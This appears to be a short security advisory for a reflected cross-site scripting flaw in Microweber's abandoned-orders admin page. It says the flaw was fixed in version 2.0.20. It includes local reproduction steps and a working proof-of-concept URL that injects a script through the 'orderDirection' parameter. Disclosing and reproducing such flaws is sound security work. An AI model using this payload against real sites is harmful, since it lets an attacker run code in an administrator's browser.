Cross Site Scripting vulnerability in the "/admin/order/abandoned" endpoint of Microweber <=2.0.19. An attacker can manipulate the "orderDirection" parameter in a crafted URL and lure a user with admin privileges into visiting it, achieving JavaScript code execution in the victim's browser. The issue was reported to the developers and fixed in version 2.0.20.
- Clone the repository and build the application using docker:
git clone -b v2.0.19 https://github.com/microweber/microweber.git cd microweber docker compose up -d - Visit http://localhost
- Follow along the UI installation process.
- Visit the following exploit URL: http://localhost/admin/order/abandoned?orderDirection=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
- The page will immediately display an alert pop-up.